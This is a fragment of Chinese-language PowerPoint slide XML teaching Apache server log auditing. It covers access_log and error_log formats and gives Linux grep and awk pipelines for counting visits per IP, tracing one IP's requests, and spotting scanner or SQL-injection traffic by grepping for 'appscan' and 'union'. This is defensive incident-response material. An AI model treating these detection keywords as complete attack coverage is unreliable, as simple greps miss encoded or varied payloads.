              </a:rPr>
              <a:t>险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掌握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开发的中间件反序列化漏洞风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险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87683" y="3811270"/>
            <a:ext cx="1004569" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1004570" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1004316" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100431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716280" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="716280" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="716280" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71628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60108"/>
            <a:ext cx="525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spc="-100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服务器日志审计</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="716280" y="2260092"/>
            <a:ext cx="10471785" cy="2862580"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10471785" h="2862579">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10471404" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10471404" y="2862072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="286207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276" y="2255011"/>
            <a:ext cx="10481945" cy="2872105"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10481945" h="2872104">
                <a:moveTo>
                  <a:pt x="10476674" y="2871838"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="2871838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="2871609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1968" y="2870936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="2869882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241" y="2868549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2867075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10476674" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10481437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862313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="2862313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2867075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10481437" y="2867075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10481208" y="2868549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10480535" y="2869882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10479481" y="2870936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10478147" y="2871609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10476674" y="2871838"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10481945" h="287210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481945" h="2872104">
                <a:moveTo>
                  <a:pt x="10471912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0471912" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10471912" y="9524"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10481945" h="2872104">
                <a:moveTo>
                  <a:pt x="10471912" y="2867075"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10471912" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10476674" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10481437" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10481437" y="2862313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10476674" y="2862313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10471912" y="2867075"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10481945" h="2872104">
                <a:moveTo>
                  <a:pt x="10481437" y="9524"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10476674" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10471912" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10481437" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10481437" y="9524"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10481945" h="2872104">
                <a:moveTo>
                  <a:pt x="9525" y="2867075"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="2862313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2862313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2867075"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10481945" h="2872104">
                <a:moveTo>
                  <a:pt x="10471912" y="2867075"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="2867075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2862313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10471912" y="2862313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10471912" y="2867075"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10481945" h="2872104">
                <a:moveTo>
                  <a:pt x="10481437" y="2867075"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10471912" y="2867075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10476674" y="2862313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10481437" y="2862313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10481437" y="28670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97723"/>
            <a:ext cx="10373995" cy="577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日志中记录了包括远程主机地址、浏览者标识、浏览者名字、请求时间、方法、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URI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2155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资源、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协议类型等信息。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711276" y="2362200"/>
            <a:ext cx="10185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Apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>典型记录格式（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>access_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>202.12.106.90?--?[19/Aug/2000:14:47:37?0400]?"GET?/?HTTP/1.0"?200?654</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>远程主机地址 （</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>216.35.116.91</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>第一个“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>位置用于记录浏览者的标识，这不只是浏览者的登录名字，而是浏览者的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址或者其 他唯一标识符。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>第二个“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用于记录浏览者进行身份验证时提供的名字。 请求时间</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(19/Aug/2000:14:47:37)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>0400”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>表示服务器所处时区位于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>UTC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>之前的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>小时</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>最后一项信息的典型格式是“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>METHOD?RESOURCE?PROTOCOL”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，即“方法资源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>协议”，记录收 到一个什么样的请求。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25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spc="-100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服务器日志审计</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="758951" y="2130551"/>
            <a:ext cx="11257915" cy="1754505"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11257915" h="1754504">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11257788" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11257788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03" y="2125916"/>
            <a:ext cx="11266805" cy="1764030"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11266805" h="1764029">
                <a:moveTo>
                  <a:pt x="11261991" y="1763852"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1763852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3302" y="1763623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1968" y="1762937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="1761883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241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11261991" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1126675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11266754" y="1759089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11266512" y="1760562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11265839" y="1761883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11264785" y="1762937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11263452" y="1763623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11261991" y="1763852"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="11266805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1266805" h="1764029">
                <a:moveTo>
                  <a:pt x="1125722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1257229" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11257229" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="11266805" h="1764029">
                <a:moveTo>
                  <a:pt x="11257229" y="1759089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11257229" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11261991" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11266754" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11266754" y="1754327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11261991" y="1754327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11257229" y="1759089"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="11266805" h="1764029">
                <a:moveTo>
                  <a:pt x="11266754" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11261991" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11257229" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11266754" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11266754" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="11266805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11266805" h="1764029">
                <a:moveTo>
                  <a:pt x="11257229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11257229" y="1754327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11257229" y="1759089"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="11266805" h="1764029">
                <a:moveTo>
                  <a:pt x="11266754" y="1759089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11257229" y="1759089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11261991" y="1754327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11266754" y="1754327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11266754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7723"/>
            <a:ext cx="1137729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Error_log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[Sun May 28 20:58:47.073243 2017] [php7:notice] [pid 13803]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[client </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>192.168.44.1:54363]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{"reqId":"WSrJh-</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="210185" marR="521843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aHzOTfSv2OaPAWUwAAAAA","</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>level</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>":3,"time":"2017-05-  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>28T12:58:47+00:00","remoteAddr":"192.168.44.1","user":"-</a:t>
            </a:r>
            <a:endParaRPr sz="18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-","app":"PHP","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method</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>":"GET","url":"\\/index.php","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r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>":"chmod(): Permission denied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</a:t>
            </a:r>
            <a:endParaRPr sz="18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\\/var\\/www\\/secloud\\/lib\\/private\\/Config.php#244"}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27407" y="3811270"/>
            <a:ext cx="165100" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="165100" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="164591" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16459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769620" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="769620" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="769620" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76962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25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spc="-100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服务器日志审计</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="769619" y="1937004"/>
            <a:ext cx="11257915" cy="4800600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11257915" h="4800600">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11257788" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11257788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073" y="1932279"/>
            <a:ext cx="11266805" cy="4811395"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11266805" h="4811395">
                <a:moveTo>
                  <a:pt x="11261979" y="4810836"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="4810836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="4810607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955" y="4809934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="4808880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="4807546"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4806073"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11261979" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11266741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801311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="4801311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="4806073"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11266741" y="4806073"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11266500" y="4807546"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11265827" y="4808880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11264773" y="4809934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11263452" y="4810607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11261979" y="4810836"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="11266805" h="481139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1266805" h="4811395">
                <a:moveTo>
                  <a:pt x="11257216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1257216" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11257216" y="9524"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="11266805" h="4811395">
                <a:moveTo>
                  <a:pt x="11257216" y="4806073"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11257216" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11261979" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11266741" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11266741" y="4801311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11261979" y="4801311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11257216" y="4806073"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="11266805" h="4811395">
                <a:moveTo>
                  <a:pt x="11266741" y="9524"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11261979" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11257216" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11266741" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11266741" y="9524"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="11266805" h="4811395">
                <a:moveTo>
                  <a:pt x="9525" y="4806073"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="4801311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="4801311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="4806073"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="11266805" h="4811395">
                <a:moveTo>
                  <a:pt x="11257216" y="4806073"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="4806073"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="4801311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11257216" y="4801311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11257216" y="4806073"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="11266805" h="4811395">
                <a:moveTo>
                  <a:pt x="11266741" y="4806073"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11257216" y="4806073"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11261979" y="4801311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11266741" y="4801311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11266741" y="480607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11134"/>
            <a:ext cx="11127105" cy="51365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Linux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命令对日志分析</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="220979">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="68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实时搜索关键字</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="220979">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="3956050" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>#tail –f access_log </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>|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grep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“appscan"	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>（ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>#cat access_log |grep </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>union"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220979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分析日志查看当天的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连接数</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="220979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cat default-access_log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grep "10/Dec/2010"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awk '{print $2}'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sort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uniq </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-c | </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>sort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-nr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查看指定的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在当天究竟访问了什么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url</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="220979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cat default-access_log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grep "10/Dec/2010"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grep "218.19.140.242"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awk '{print $7}'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sort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uniq </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-c | </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>sort </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>nr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查看当天访问排行前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的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url</a:t>
            </a:r>
            <a:endParaRPr sz="18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cat default-access_log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grep "10/Dec/2010"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awk '{print $7}'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sort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uniq </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-c | </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>sort -nr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head </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-n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4.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看到指定的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究竟干了什么</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="220979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cat default-access_log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grep 218.19.140.242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awk '{print $1"\t"$8}'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sort </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>uniq </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-c | </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>sort -nr </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>|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5.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查看访问次数最多的几个分钟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找到热点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awk '{print $4}' default-access_log |cut </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-c </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>14-18|sort|uniq -c|sort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-nr|head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25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Apache</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-100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服务器日志审计</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010411" y="2862072"/>
            <a:ext cx="10307320" cy="368935"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
